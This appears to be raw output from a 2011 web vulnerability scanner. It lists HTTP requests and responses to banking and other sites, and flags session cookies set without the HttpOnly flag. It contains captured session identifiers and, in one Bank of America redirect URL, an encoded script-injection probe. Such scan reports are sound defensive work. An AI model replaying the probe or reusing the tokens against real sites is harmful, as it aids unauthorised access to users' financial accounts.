GET / HTTP/1.1 Host: learn.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>Personal F ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/gen3loc/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:10:53 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=1855EA832F144EB2386254CA5EA62C0D.ftb-web3; Path=/locator/gen3loc Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/gen3loc Location: http://locators.bankofamerica.com/locator/gen3loc/jsp/index.jsp?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/locator/LocatorAction.do HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:10:44 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=DB67375326A3DF6B103B3EB5CE101EA1.ftb-web1; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/LocatorAction.do?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=d2m29fhd3k250v7inbf5p7la41; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: lovely-faces.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 20:21:13 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Vary: Accept-Encoding Set-Cookie: PHPSESSID=d2m29fhd3k250v7inbf5p7la41; path=/ Last-Modified: Sat, 05 Feb 2011 09:23:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 30648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/assistance/access.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/assistance/contact.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/assistance/index.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/assistance/lost.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/buxx.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/credit.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/debit.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/gift.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/index.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/prepaid.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/readylink.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/travelmoney.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/discounts/index.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/index.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/legal.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/military/login.jsp HTTP/1.1 Host: militarybankonline.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mfnfopwd/ HTTP/1.1 Host: myaccountsaws.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:06 GMT Server: IBM_HTTP_Server Content-Length: 12458 Set-Cookie: JSESSIONID=0001y-jIhHTKM6s3Y1_oSLOT9oS:15cea9hua; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US
<?xml version="1.0" encoding="ISO-8859-1" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: online.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 18175 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; ASPSESSIONIDAGCQRSRC=BFDJILIABKKFNCJMKPJHEKFE; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33016 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDCEBTTQTD=CBKHKLIACNGDOFLANKMCMJAE; secure; path=/ Date: Wed, 02 Feb 2011 22:45:28 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33016 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=FADJILIALPKBMLEBFOALEPLO; secure; path=/ Date: Wed, 02 Feb 2011 21:59:51 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; ASPSESSIONIDAGCQRSRC=BFDJILIABKKFNCJMKPJHEKFE; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33016 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDCURDRQSB=OFLPJLIAOCPGBDIFMIHMIECE; secure; path=/ Date: Thu, 03 Feb 2011 01:05:05 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inetSearch/index.jsp HTTP/1.1 Host: query.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:18 GMT Server: Apache Cache-Control: no-cache="set-cookie" Set-Cookie: JSESSIONID=KFKmNJJKBh8w3T235vB2R8Qz32jnddvvJrrlLsGRnnK7nB5DNzGx!1437584885; path=/ X-Powered-By: Servlet/2.4 JSP/2.0 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 18669
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do HTTP/1.1 Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=686F25B2A610A0A70D54FF608686FDBA; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 22:02:24 GMT Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=2p89gp55i3nje29ques3sj6a45; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ip-board/ HTTP/1.1 Host: search.wareseeker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:24:27 GMT Server: Apache Set-Cookie: PHPSESSID=2p89gp55i3nje29ques3sj6a45; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCQATDDAR=FGIHILFAKFPCACOOHKFEFHBP; path=/ Date: Wed, 02 Feb 2011 22:02:31 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rate36s.asp? HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19 Content-Type: text/html Set-Cookie: ASPSESSIONIDCQATDDAR=NGIHILFABKDPKDCHAENGBKCJ; path=/ Date: Wed, 02 Feb 2011 22:02:33 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetIDScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetPasscodeScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/signon.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: smallbusinessonlinecommunity.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
TestSess3=30041296684284122624552;path=/
CoreID6=30041296684284122624552; path=/; expires=Sun, 01 Feb 2026 22:04:44 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:04:44 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Set-Cookie: CoreID6=30041296684284122624552; path=/; expires=Sun, 01 Feb 2026 22:04:44 GMT Set-Cookie: TestSess3=30041296684284122624552;path=/ Location: http://data.coremetrics.com/cm?tid=1&ci=90010394&vn2=e4.0&st=1296684336309&vn1=4.2.7.1BOA&ec=utf-8&pi=AboutBAC%3AHelp%3APageNotFound%3BCF-HTTP-PageNotFound&cg=AboutBAC%3AHelp%3APageNotFound&rnd=1296688180794&ul=http%3A//www.bankofamerica.com/findit/error.cgi&pv11=%7C000302027g850000c336%7C&rf=http%3A//www.bankofamerica.com/vehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E45ae18a6011/index.cfm&cvdone=p&cmig=y Content-Type: text/plain; charset=UTF-8 Content-Length: 0
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Thu, 03 Feb 2011 01:04:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Location: pbl.asp Content-Length: 128 Content-Type: text/html Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=BDCPFOICCKLENOGJKIBLOLMG; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: support01.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:00 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3 X-Powered-By: PHP/5.2.3 Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Content-Length: 1713 Connection: close Content-Type: text/html
